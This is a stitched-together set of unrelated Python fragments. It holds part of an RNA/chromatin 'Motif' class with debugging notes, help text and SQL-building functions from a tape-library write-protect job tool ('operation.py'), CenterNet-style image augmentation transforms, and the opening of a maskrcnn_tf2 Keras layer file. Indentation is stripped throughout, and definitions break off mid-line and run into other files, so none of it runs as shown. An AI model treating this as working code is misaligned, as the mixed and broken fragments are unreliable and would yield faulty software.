        print ("Object NoneType (undefined)")
    #
    sys.exit(1)
#
class Motif(object):
def __init__(self, i, j, Vij, ctp, btp, branching, pk = [], wyspa = []):
self.Ob = None # <<<=== transition to objects Stem, MBL, XLoop
self.Vij = Vij # the free energy
self.ctp = ctp # connection type
self.btp = btp # bond type
self.branching = branching # what linkage is pointed to
self.tlen = 0.0 # for Stem
self.xi = xi # default Kuhn length
if len(self.branching) == 0:
if ctp == 'B' or ctp == 'W':
"""190517
I encountered the following problem ... Apparently, in
this example, the sequence has two neighboring closely
ligated structures. Because the program must reject
internals, it seems that this created a W-loop for
(12,16) that resembled the B-loop. So it tried to
store it this way. Presently, I think it is ok to just
accept a W as a very strong B-loop. However, this
needs to be paid some attention. The relevant output
from the debugging settings is shown below.
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
dGijh(W) = -3.66, dGbest = -3.66
ijh i( 12) <- ih( 12) <- jh( 14) <- j( 16):
find_ctcf_islands; warning ctcf ij(12,14) --> proximal ligation (j(14) - i(12) = 2)
ijh i( 12) <- ih( 14) <- jh( 16) <- j( 16):
find_ctcf_islands; warning ctcf ij(14,16) --> proximal ligation (j(16) - i(14) = 2)
wyspa: [(12, 16), (14, 16)]
dGh( -7.76) vs best_dG( -3.66)
-- island generates more negative free energy
full island: zone( [(12, 14), (14, 16)] )
wyspa( [(12, 16), (14, 16)] )
joinW( [] )
dG -7.760
dG_best -3.664
ddG -4.096
found 2 CTCF island
ERROR(Motif(12,16)): unrecognized linkage for type W.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
"""
self.branching = [(i,j)]
else:
print ("ERROR(Motif(%d,%d)): unrecognized linkage for type %s." \
% (i, j, ctp))
sys.exit(1)
#
#
self.base = (i,j) # the base reference point
self.pk = pk
# contains a list of ordered pairs for the linkage stem(s),
# e.g., [( 7,20), ( 8,19), ( 9,18), (10,16)]
self.wyspa = wyspa # contains a list; e.g., [(38, 43), (40, 43)]
#
#
def get_base(self):
tp = self.Ob
if tp == None:
bonds = []
if self.ctp == 'P' or self.ctp == 'J':
# J and P do not have a bond at the base
bonds = self.branching
else:
# B, I, K, and M have a bond at the base, and W is
            # effectively a cluster of bonds, one of which outlines the
# entire structure
bonds = [self.base]
return bonds
#
elif tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop":
return self.Ob.get_base()
else:
print ("Motif error(get base)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_branches(self):
tp = self.Ob
if tp == None:
jj = []
if not (self.ctp == 'B' or self.ctp == 'X'):
for jjk in self.branching:
jj += [jjk]
#
#
return jj
elif tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop":
return self.Ob.get_branches()
else:
print ("Motif error(get_branches): ", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_stem(self):
if self.Ob == None:
print ("ERROR: Stem ijt(%d,%d) not defined!" % (self.base[0], self.base[1]))
print (self.show_Motif())
sys.exit(1)
else:
return self.Ob.get_stem()
#
#
def get_Vij(self):
tp = self.Ob
if tp == None:
"""
print ("Vij is not set for %s, ctp(%s), btp(%s)" \
% (self.base, self.ctp, self.btp))
sys.exit(1)
"""
return self.Vij
elif (tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop"):
return self.Ob.Vij
else:
print ("Motif error(get_Vij)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_ctp(self):
tp = self.Ob
if tp == None:
"""
print ("ctp is not set for %s, ctp(%s), btp(%s)" \
% (self.base, self.ctp, self.btp))
sys.exit(1)
"""
return self.ctp
elif (tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop"):
return self.Ob.ctp
else:
print ("Motif error(get_ctp)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_btp(self):
tp = self.Ob
if tp == None:
"""
print ("btp is not set for %s, ctp(%s), btp(%s)" \
% (self.base, self.ctp, self.btp))
sys.exit(1)
"""
return self.btp
elif (tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop"):
return self.Ob.btp
else:
print ("Motif error(get_btp)", self.base)
print (type(self.Ob))
sys.exit(0)
#
#
def get_pks(self):
return self.pk # pk contains a list of links (pairs)
#
def get_wyspa(self):
return self.wyspa # wyspa contains a list of interaction points
#
def show_Motif(self):
if self.Ob == None:
return self.base, self.ctp, self.btp, self.Vij, self.branching, self.pk, self.wyspa
elif self.Ob.name == "Stem":
return self.Ob.disp_Stem()
elif self.Ob.name == "MBL":
return self.Ob.disp_MBL()
elif self.Ob.name == "XLoop":
return self.Ob.disp_XLoop()
else:
print ("Motif error(show_Motif)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
#
# This carries the fundamental information that is needed to construct
# the various "secondary structure" elements in this approach.
class Link:
# #############################################################
# 190618; this should now take on the functions that we have
# defined in Motif. Right now, we are in transition, but I think
# this is where the operations should occur, not in the current
# "Motif". The classes that actually should be "motif" are Stem,
# MBL, XLoop, PseudoKnot, MultiPair, etc. and then we use the
# tools currently in Motif to process these functions.
# #############################################################
    def __init__(self, i, j, Vij, ctp, btp, branching,
setting."
print "<association>:<object> temporarily override default association for <object>"
print
print "EXAMPLE:"
print "operation.py create write_protect_on WP3 CAP3: VO2093 VO2094 VO2095 VO2096 VO2097 VO2098 VO2099 VO2152 VO2154 VO2195 VO2196 VO2197 VO2198 VO2199 VO2203 VO2206 VO2207 VO2208 VO2209 VO2211 VO2213 CAP4: VO2224 VO2225 VO2226 VO2227 VO2245 VO2246 VO2252 VO2253 VO2254 VO2256 VO2257 VO2258 VO2259 VO2501 VO2532 VO2533 VO2534 VO2540 VO2541 VO2542 VO2544"
elif topic == "list":
print
print "operation.py list [all|open|finished|closed|completed|<job>+|has <object>]"
print
print "all: list all jobs"
print "open: list all open (not closed) jobs"
print "finished|closed|completed: list all completed jobs. finished|closed|completed are the same thing"
print "<job>+ : list named jobs"
print "has <object>: list all jobs that have <object> as an argument"
elif topic == "show":
print
print "operation.py show <job>+"
print
print "show details of <job>s in the list. <job> is addressed by its unique name"
elif topic == "current":
print
print "operation.py current <job>+"
print
print "show the current task of <job>."
print "A current task is one that has stared but its next task has not started"
print "A job can have at most one such task at any time"
print "in case of a not yet started job, current task is task 0"
print "in case of a finished job, current task is the last task"
elif topic == "next":
print
print "operation.py next <job>+"
print
print "show next task of <job>"
print "next task is one that has not started and its previous task has finished."
print "in case of a have-not-started job, next task is the first task."
print "in case of a finished job, next task is task 0"
elif topic == "start":
print
print "operation.py start <job> [<arg>]"
print
print "start the next task of <job> with optional argument"
print "next task can start only if current task has finished"
print
print "EXAMPLE:"
print "operation.py start STKWP3 <help_desk_ticket_id>"
elif topic == "finish":
print
print "operation.py finish <job> [<result>]"
print
print "finish current task of <job> with optional <result>"
print "EXAMPLE:"
print "operation.py finish STKWP3 DONE"
elif topic == "delete":
print
print "operation.py delete <job>+ [sincerely]"
print
print "delete <job> in the list"
print "this is a dangerous command, use with extra care"
print '<job>s will not be deleted unless "sincerely" is specified at the end'
elif topic == "find" or topic == "locate":
print
print "operation.py find|locate <object>+"
print
print "list the jobs that have <object> as an argument"
elif topic == "find+" or topic == "locate+":
print
print "operation.py find+|locate+ <object>+"
print
print "same as find|locate but show details of the jobs"
elif topic == "recommend_write_protect_on" or topic == "recommend_write_protect_off":
print
print "operation.py recommend_write_protect_on [<library_list>] [limit <n>]"
print "operation.py recommend_write_protect_off [<library_list>] [limit <n>]"
print
print "list recommended volumes for write protect tab flipping on/off"
print
print "<library_list> is a list of media types separated by comma ','"
print "when <library_list> is omitted, the default list takes place"
print
print "with 'limit <n>', it only lists, at most, first <n> volumes for the job"
print "otherwise, it lists all"
print
print "EXAMPLES:"
print "operation.py recommend_write_protect_on"
print "operation.py recommend_write_protect_on 9940,CD-9940B"
print "operation.py recommend_write_protect_on limit 100"
print "operation.py recommend_write_protect_on 9940,CD-9940B limit 100"
print "operation.py recommend_write_protect_off"
print "operation.py recommend_write_protect_off 9940,CD-9940B"
print "operation.py recommend_write_protect_off limit 100"
print "operation.py recommend_write_protect_off 9940,CD-9940B limit 100"
elif topic == "auto_write_protect_on" or topic == "auto_write_protect_off":
print
print "operation.py auto_write_protect_on [<library_list>] [no_limit]"
print "operation.py auto_write_protect_off [<library_list>] [no_limit]"
print
print "from recommended list, create a job for write protect tab flipping on/off"
print "and generate a helpdesk ticket automatically"
print
print "<library_list> is a list of media types separated by comma ','"
print
print "there is a default limit of 10 caps (220 volume)"
print "with 'no_limit', it generates everything in one ticket"
print
print "EXAMPLES:"
print "operation.py auto_write_protect_on"
print "operation.py auto_write_protect_on 9940,CD-9940B"
print "operation.py auto_write_protect_on no_limit"
print "operation.py auto_write_protect_on 9940,CD-9940B no_limit"
print "operation.py auto_write_protect_off"
print "operation.py auto_write_protect_off 9940,CD-9940B"
print "operation.py auto_write_protect_off no_limit"
print "operation.py auto_write_protect_off 9940,CD-9940B no_limit"
elif topic == 'auto_close_all':
print
print "operation.py auto_close_all"
print
print "try to close all finished open jobs on this cluster"
print
print "this command is meant for script/cronjob or experts!!"
else:
print "don't know anything about %s"%(topic)
print
help()
# even(i) -- True is i is an even number
def even(i):
return int(i/2)*2 == i
# caps_per_ticket(lib_type) -- determine caps per ticket
def caps_per_ticket(lib_type):
if lib_type == '9310':
return 10
elif lib_type == 'aml2':
return 7
elif lib_type[:4] == '8500':
return 5
else:
return None
def volumes_per_cap(lib_type):
if lib_type == '9310':
return 21
elif lib_type == 'aml2':
return 30
elif lib_type[:4] == '8500':
return 39
else:
return None
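# Example (illustrative): for a 9310 robot the default per-ticket volume limit
# used below is caps_per_ticket('9310') * volumes_per_cap('9310') = 10 * 21 = 210.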
# same_tape_library(libs) -- check if all libraries are using the same robot
def same_tape_library(libs):
l = libs.split(",")
t = library_type(cluster, l[0])
if len(l) > 1:
for i in l[1:]:
if library_type(cluster, i) != t:
return None
return t
# dump() -- dump all global variables
def dump():
for i in __builtins__.globals().keys():
if i[:2] == '__': # internal
continue
if type(__builtins__.globals()[i]) == type(1) or \
type(__builtins__.globals()[i]) == type(1.0) or \
type(__builtins__.globals()[i]) == type("") or \
type(__builtins__.globals()[i]) == type({}) or \
type(__builtins__.globals()[i]) == type([]):
print i, '=',
pprint.pprint(__builtins__.globals()[i])
# complex operations
# CAPS_PER_TICKET = 10
# VOLUMES_PER_CAP = 21
def recommend_write_protect_job(library=DEFAULT_LIBRARIES, limit=None):
# check if they are of the same robot
lt = same_tape_library(library)
if not lt:
print "Error: %s are not the same robot"%(library)
return {}
CAPS_PER_TICKET = caps_per_ticket(lt)
VOLUMES_PER_CAP = volumes_per_cap(lt)
# take care of limit:
# if limit == None: limit = default
# if limit == 0: no limit
# if limit == n, let it be n
if limit == None: # use default
limit = CAPS_PER_TICKET * VOLUMES_PER_CAP
if lt == 'aml2':
op = 'aWP'
elif lt == '8500GS':
op = 'rWP'
elif lt == '8500G1':
op = 'sWP'
elif lt == '8500F1':
op = 'tWP'
else:
op = 'WP'
# get max cap number
n = get_max_cap_number(cluster, op) + 1
# get exclusion list:
q = "select object from object, job \
where \
object.job = job.id and \
job.finish is null;"
if debug:
print q
excl = db.query_getresult(q)
# take care of libraries
lb = library.split(",")
lbs = "(library = '%s'"%(lb[0])
for i in lb[1:]:
lbs = lbs + " or library = '%s'"%(i)
lbs = lbs+")"
q = "" # to make lint happy
if excl:
exclusion = "'%s'"%(excl[0][0])
for i in excl[1:]:
exclusion = exclusion+','+"'%s'"%(i[0])
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'full' and \
write_protected != 'y' and \
not storage_group in (select * from no_flipping_storage_group) and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not file_family like '%%-MIGRATION%%' and \
not label in (%s) \
order by si_time_1 asc"%(lbs, exclusion)
else:
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'full' and \
write_protected != 'y' and \
not storage_group in (select * from no_flipping_storage_group) and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not file_family like '%%-MIGRATION%%' \
order by si_time_1 asc "%(lbs)
if limit:
q = q + ' limit %d;'%(limit)
else:
q = q + ';'
if debug:
print q
res = edb.query_getresult(q)
job = {}
j = 0
cap_n = n
for i in range(len(res)):
if j == 0:
job[cap_n] = []
job[cap_n].append(res[i][0])
j = j + 1
if j >= VOLUMES_PER_CAP:
j = 0
cap_n = cap_n + 1
return job
def recommend_write_permit_job(library=DEFAULT_LIBRARIES, limit=None):
# check if they are of the same robot
lt = same_tape_library(library)
if not lt:
print "Error: %s are not the same robot"%(library)
return {}
CAPS_PER_TICKET = caps_per_ticket(lt)
VOLUMES_PER_CAP = volumes_per_cap(lt)
# take care of limit:
# if limit == None: limit = default
# if limit == 0: no limit
# if limit == n, let it be n
if limit == None: # use default
limit = CAPS_PER_TICKET * VOLUMES_PER_CAP
if lt == 'aml2':
op = 'aWE'
elif lt == '8500GS':
op = 'rWE'
elif lt == '8500G1':
op = 'sWE'
elif lt == '8500F1':
op = 'tWE'
else:
op = 'WE'
# get max cap number
n = get_max_cap_number(cluster, op) + 1
# get exclusion list:
q = "select object from object, job \
where \
object.job = job.id and \
job.finish is null;"
if debug:
print q
excl = db.query_getresult(q)
# take care of libraries
lb = library.split(",")
lbs = "(library = '%s'"%(lb[0])
for i in lb[1:]:
lbs = lbs + " or library = '%s'"%(i)
lbs = lbs+")"
q = "" # to make lint happy
if excl:
exclusion = "'%s'"%(excl[0][0])
for i in excl[1:]:
exclusion = exclusion+','+"'%s'"%(i[0])
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'none' and \
write_protected != 'n' and \
not storage_group in (select * from no_flipping_storage_group) and \
not file_family like '%%-MIGRATION%%' and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not label in (%s) \
order by label"%(lbs, exclusion)
else:
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'none' and \
write_protected != 'n' and \
not storage_group in (select * from no_flipping_storage_group) and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not file_family like '%%-MIGRATION%%' \
order by label "%(lbs)
if limit:
q = q + " limit %d;"%(limit)
else:
q = q + ";"
if debug:
print q
res = edb.query_getresult(q)
job = {}
j = 0
cap_n = n
for i in range(len(res)):
if j == 0:
job[cap_n] = []
job[cap_n].append(res[i][0])
j = j + 1
if j >= VOLUMES_PER_CAP:
j = 0
cap_n = cap_n + 1
return job
# make_cap_args(d) -- make arguments from a dictionary
def make_cap_args(d):
res = []
for k in d.keys():
if d[k]:
res.append('CAP' + str(k) + ':')
for i in d[k]:
res.append(i)
return res
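# Example (illustrative, volume names hypothetical):
#   make_cap_args({3: ['VO2093', 'VO2094'], 4: ['VO2224']})
#   returns ['CAP3:', 'VO2093', 'VO2094', 'CAP4:', 'VO2224']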
# make_cap(list)
def make_cap(l, library_type='9310', cap_n = 0):
    cap_script
        masked_gaussian = gaussian[radius - top:radius + bottom, radius -
                                   left:radius + right]
if min(masked_gaussian.shape) > 0 and min(
masked_heatmap.shape) > 0: # TODO debug
np.maximum(masked_heatmap, masked_gaussian * k, out=masked_heatmap)
return heatmap
def get_dir(self, src_point, rot_rad):
sn, cs = np.sin(rot_rad), np.cos(rot_rad)
src_result = [0, 0]
src_result[0] = src_point[0] * cs - src_point[1] * sn
src_result[1] = src_point[0] * sn + src_point[1] * cs
return src_result
def get_3rd_point(self, a, b):
direct = a - b
return b + np.array([-direct[1], direct[0]], dtype=np.float32)
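    # get_3rd_point returns b plus the 90-degree rotation of (a - b), i.e. the
    # third corner of the right triangle used to anchor the affine transform.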
def get_affine_transform(self,
center,
scale,
rot,
output_size,
shift=np.array([0, 0], dtype=np.float32),
inv=0):
if isinstance(scale, torch.Tensor):
scale = scale.cpu().squeeze().numpy()
if isinstance(center, torch.Tensor):
center = center.cpu().squeeze().numpy()
if not isinstance(scale, np.ndarray) and not isinstance(scale, list):
scale = np.array([scale, scale], dtype=np.float32)
scale_tmp = scale
src_w = scale_tmp[0]
dst_w = output_size[0]
dst_h = output_size[1]
if isinstance(dst_w, torch.Tensor):
dst_w = dst_w.cpu().squeeze().numpy()
if isinstance(dst_h, torch.Tensor):
dst_h = dst_h.cpu().squeeze().numpy()
rot_rad = np.pi * rot / 180
src_dir = self.get_dir([0, src_w * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :] = center + scale_tmp * shift
src[1, :] = center + src_dir + scale_tmp * shift
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir
src[2:, :] = self.get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = self.get_3rd_point(dst[0, :], dst[1, :])
if inv:
trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return trans
def affine_transform(self, pt, t):
new_pt = np.array([pt[0], pt[1], 1.], dtype=np.float32).T
new_pt = np.dot(t, new_pt)
return new_pt[:2]
def get_border(self, border, size):
i = 1
while size - border // i <= border // i:
i *= 2
return border // i
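    # get_border halves the border until it is smaller than half of size
    # (e.g. get_border(128, 200) -> 64), so that np.random.randint(low, high)
    # in __call__ always receives a valid low < high range.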
def __call__(self, results):
# apply transforms
        flip = np.random.rand() < self.flip_ratio
# randomly sample a scale
img = results['img']
height, width = img.shape[0], img.shape[1]
img_shape = img.shape
c = np.array([img.shape[1] / 2., img.shape[0] / 2.],
dtype=np.float32)
if self.keep_ratio:
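            # (x | d) + 1 pads x up to a multiple of d + 1 when d = 2**k - 1
            # (e.g. size_divisor = 31 pads to a multiple of 32).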
input_h = (height | self.size_divisor) + 1
input_w = (width | self.size_divisor) + 1
s = np.array([input_w, input_h], dtype=np.float32)
else:
s = max(img.shape[0], img.shape[1]) * 1.0
input_h, input_w = self.img_scales[0]
s = s * np.random.choice(np.arange(0.6, 1.4, 0.1))
w_border = self.get_border(128, img.shape[1])
h_border = self.get_border(128, img.shape[0])
c[0] = np.random.randint(
low=w_border, high=img.shape[1] - w_border)
c[1] = np.random.randint(
low=h_border, high=img.shape[0] - h_border)
if flip:
img = img[:, ::-1, :]
c[0] = width - c[0] - 1
trans_input = self.get_affine_transform(c, s, 0, [input_w, input_h])
inp = cv2.warpAffine(
img, trans_input, (input_w, input_h), flags=cv2.INTER_LINEAR)
pad_shape = inp.shape
scale_factor = np.array([(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0]),
(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0])],
dtype=np.float32)
#inp = inp[:,:,::-1]
inp = (inp.astype(np.float32) / 255.)
self.color_aug(self._data_rng, inp, self._eig_val, self._eig_vec)
mean = np.array(
self.img_norm_cfg['mean'], dtype=np.float32).reshape(1, 1, 3)
std = np.array(
self.img_norm_cfg['std'], dtype=np.float32).reshape(1, 1, 3)
inp = (inp - mean) / std
inp = inp.transpose(2, 0, 1)
img = inp.copy()
# TODO: change to down_ratio
output_h = input_h // 4
output_w = input_w // 4
trans_output = self.get_affine_transform(c, s, 0, [output_w, output_h])
hm = np.zeros((self.num_classes, output_h, output_w),
dtype=np.float32)
wh = np.zeros((self.max_objs, 2), dtype=np.float32)
reg = np.zeros((self.max_objs, 2), dtype=np.float32)
ind = np.zeros((self.max_objs), dtype=np.int64)
reg_mask = np.zeros((self.max_objs), dtype=np.uint8)
ann = results['ann_info']
for k in range(min(len(ann['labels']), self.max_objs)):
bbox = ann['bboxes'][k]
cls_id = ann['labels'][k] - 1
if flip:
bbox[[0, 2]] = width - bbox[[2, 0]] - 1
# tranform bounding box to output size
bbox[:2] = self.affine_transform(bbox[:2], trans_output)
bbox[2:] = self.affine_transform(bbox[2:], trans_output)
bbox[[0, 2]] = np.clip(bbox[[0, 2]], 0, output_w - 1)
bbox[[1, 3]] = np.clip(bbox[[1, 3]], 0, output_h - 1)
h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]
if h > 0 and w > 0:
# populate hm based on gd and ct
radius = self.gaussian_radius((math.ceil(h), math.ceil(w)))
radius = max(0, int(radius))
ct = np.array([(bbox[0] + bbox[2]) / 2,
(bbox[1] + bbox[3]) / 2],
dtype=np.float32)
ct_int = ct.astype(np.int32)
self.draw_umich_gaussian(hm[cls_id], ct_int, radius)
wh[k] = 1. * w, 1. * h
ind[k] = ct_int[1] * output_w + ct_int[0]
reg[k] = ct - ct_int
reg_mask[k] = 1
img_info = results['img_info']
ori_shape = (img_info['height'], img_info['width'], 3)
img_meta = dict(
ori_shape=ori_shape,
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
flip=flip)
data = dict(
img=DC(to_tensor(img), stack=True),
img_meta=DC(img_meta, cpu_only=True),
gt_bboxes=DC(to_tensor(results['gt_bboxes'])))
data['gt_labels'] = DC(to_tensor(results['gt_labels']))
data['hm'] = DC(to_tensor(hm), stack=True)
data['reg_mask'] = DC(
to_tensor(reg_mask).unsqueeze(1), stack=True, pad_dims=1)
data['ind'] = DC(
to_tensor(ind).unsqueeze(1), stack=True, pad_dims=1)
data['wh'] = DC(to_tensor(wh), stack=True, pad_dims=1)
data['reg'] = DC(to_tensor(reg), stack=True, pad_dims=1)
return data
@PIPELINES.register_module
class CtdetTestTransforms(object):
def __init__(self,
size_divisor,
keep_ratio,
input_res,
img_norm_cfg):
self.size_divisor = size_divisor
self.keep_ratio = keep_ratio
self.input_res = input_res
self.img_norm_cfg = img_norm_cfg
def get_dir(self, src_point, rot_rad):
sn, cs = np.sin(rot_rad), np.cos(rot_rad)
src_result = [0, 0]
src_result[0] = src_point[0] * cs - src_point[1] * sn
src_result[1] = src_point[0] * sn + src_point[1] * cs
return src_result
def get_3rd_point(self, a, b):
direct = a - b
return b + np.array([-direct[1], direct[0]], dtype=np.float32)
def get_affine_transform(self,
center,
scale,
rot,
output_size,
shift=np.array([0, 0], dtype=np.float32),
inv=0):
if isinstance(scale, torch.Tensor):
scale = scale.cpu().squeeze().numpy()
if isinstance(center, torch.Tensor):
center = center.cpu().squeeze().numpy()
if not isinstance(scale, np.ndarray) and not isinstance(scale, list):
scale = np.array([scale, scale], dtype=np.float32)
scale_tmp = scale
src_w = scale_tmp[0]
dst_w = output_size[0]
dst_h = output_size[1]
if isinstance(dst_w, torch.Tensor):
dst_w = dst_w.cpu().squeeze().numpy()
if isinstance(dst_h, torch.Tensor):
dst_h = dst_h.cpu().squeeze().numpy()
rot_rad = np.pi * rot / 180
src_dir = self.get_dir([0, src_w * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :] = center + scale_tmp * shift
src[1, :] = center + src_dir + scale_tmp * shift
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir
src[2:, :] = self.get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = self.get_3rd_point(dst[0, :], dst[1, :])
if inv:
trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return trans
def __call__(self, results):
img = results['img']
scale = results['scale'] # (1,1)
flip = results['flip']
height, width = img.shape[0:2] # (928, 1650, 3)
new_height = int(height * scale[0])
new_width = int(width * scale[1])
img_shape = (new_height, new_width)
if self.keep_ratio:
inp_height = (new_height | self.size_divisor) + 1
inp_width = (new_width | self.size_divisor) + 1
c = np.array([new_width // 2, new_height // 2],
dtype=np.float32)
s = np.array([inp_width, inp_height], dtype=np.float32)
else:
inp_height, inp_width = self.input_res[0], self.input_res[1]
c = np.array([new_width / 2., new_height / 2.], #center
dtype=np.float32)
s = max(height, width) * 1.0 #1650
#print(inp_height, inp_width) #(512, 800)
trans_input = self.get_affine_transform(c, s, 0,
[inp_width, inp_height])
resized_image = cv2.resize(img, (new_width, new_height))
#print(resized_image.shape)
inp_image = cv2.warpAffine(
resized_image,
trans_input, (inp_width, inp_height),
flags=cv2.INTER_LINEAR)
#cv2.imwrite('/data1/centernet/1.jpg', inp_image)
#img meta calculations
#inp_image = cv2.resize(img, (inp_width, inp_height))
pad_shape = inp_image.shape[:2]
scale_factor = np.array([(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0]),
(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0])],
dtype=np.float32) #[0.4848485 0.4827586 0.4848485 0.4827586]
mean = np.array(
self.img_norm_cfg['mean'],
dtype=np.float32).reshape(1, 1, 3)
std = np.array(
self.img_norm_cfg['std'],
dtype=np.float32).reshape(1, 1, 3)
#cv2.imwrite('/data1/centernet/1.jpg', inp_image)
#inp_image = inp_image[:,:,::-1]
inp_image = ((inp_image / 255. - mean) / std).astype(
np.float32)
_img = inp_image.transpose(2, 0, 1)
if flip:
_img = _img[:, :, ::-1].copy()
if 'img_info' not in results.keys():
img_info = {'height': height, 'width': width}
else:
img_info = results['img_info']
_img_meta = dict(
ori_shape=(img_info['height'], img_info['width'], 3),
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
ctdet_c=c,
ctdet_s=s,
ctdet_out_height=inp_height // 4,
ctdet_out_width=inp_width // 4,
flip=flip)
data = dict(img=_img, img_meta=DC(_img_meta, cpu_only=True))
return data
class Albu(object):
def __init__(self,
transforms,
bbox_params=None,
keymap=None,
update_pad_shape=False,
skip_img_without_anno=False):
"""
Adds custom transformations from Albumentations lib.
Please, visit `https://albumentations.readthedocs.io`
to get more information.
transforms (list): list of albu transformations
bbox_params (dict): bbox_params for albumentation `Compose`
keymap (dict): contains {'input key':'albumentation-style key'}
skip_img_without_anno (bool): whether to skip the image
if no ann left after aug
"""
self.transforms = transforms
self.filter_lost_elements = False
self.update_pad_shape = update_pad_shape
self.skip_img_without_anno = skip_img_without_anno
# A simple workaround to remove masks without boxes
if (isinstance(bbox_params, dict) and 'label_fields' in bbox_params
and 'filter_lost_elements' in bbox_params):
self.filter_lost_elements = True
self.origin_label_fields = bbox_params['label_fields']
bbox_params['label_fields'] = ['idx_mapper']
del bbox_params['filter_lost_elements']
self.bbox_params = (
self.albu_builder(bbox_params) if bbox_params else None)
self.aug = Compose([self.albu_builder(t) for t in self.transforms],
bbox_params=self.bbox_params)
if not keymap:
self.keymap_to_albu = {
'img': 'image',
'gt_masks': 'masks',
'gt_bboxes': 'bboxes'
}
else:
self.keymap_to_albu = keymap
# malfonsoNeoris/maskrcnn_tf2
import efficientnet.keras as efn
import numpy as np
import tensorflow as tf
from classification_models.keras import Classifiers
from common import utils
from tensorflow.keras import layers as tfl
# Subclassed tf.keras API
@tf.keras.utils.register_keras_serializable()
class NormBoxesLayer(tfl.Layer):
"""Converts boxes from pixel coordinates to normalized coordinates.
boxes: [..., (y1, x1, y2, x2)] in pixel coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in normalized coordinates
"""
def __init__(self, name='norm_boxes', **kwargs):
super(NormBoxesLayer, self).__init__(name=name, **kwargs)
self.shift = np.array((0., 0., 1., 1.))
self.const = np.array(1.0)
def build(self, input_shape):
self.built = True
super(NormBoxesLayer, self).build(input_shape)
def call(self, inputs, **kwargs):
# assert inputs is tuple
boxes, shape = inputs
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - self.const
return tf.math.divide(boxes - self.shift, scale)
def get_config(self):
config = super(NormBoxesLayer, self).get_config()
config.update({"shift": self.shift, 'const': self.const})
return config
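# A minimal usage sketch for NormBoxesLayer (made-up box and shape values):
#   layer = NormBoxesLayer()
#   boxes = tf.constant([[0., 0., 100., 200.]])         # pixel (y1, x1, y2, x2)
#   normed = layer((boxes, tf.constant([200., 400.])))  # ~[[0., 0., 0.4975, 0.4987]]
# The subtraction of self.const (h - 1, w - 1 in the scale) is what moves
# (y2, x2) from "outside the box" in pixels to "inside the box" in
# normalized coordinates.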
@tf.keras.utils.register_keras_serializable()
class ResnetConvBlock(tfl.Layer):
def __init__(self, filters, kernel_size=3, strides=(2, 2), use_bias=True,
train_bn=True, name='resnet_conv_block', **kwargs):
"""
Args:
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
strides: strides for shortcut
use_bias: Boolean. To use or not use a bias in conv layers.
name: block name
**kwargs:
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
"""
super(ResnetConvBlock, self).__init__(name=name, **kwargs)
self.filters = filters
self.kernel_size = kernel_size
self.strides = strides
filters1, filters2, filters3 = self.filters
self.conv2a = tf.keras.layers.Conv2D(filters1, kernel_size=(1, 1), strides=strides, use_bias=use_bias)
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters2, kernel_size=kernel_size, padding='same', use_bias=use_bias)
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2c = tf.keras.layers.Conv2D(filters3, kernel_size=(1, 1), use_bias=use_bias)
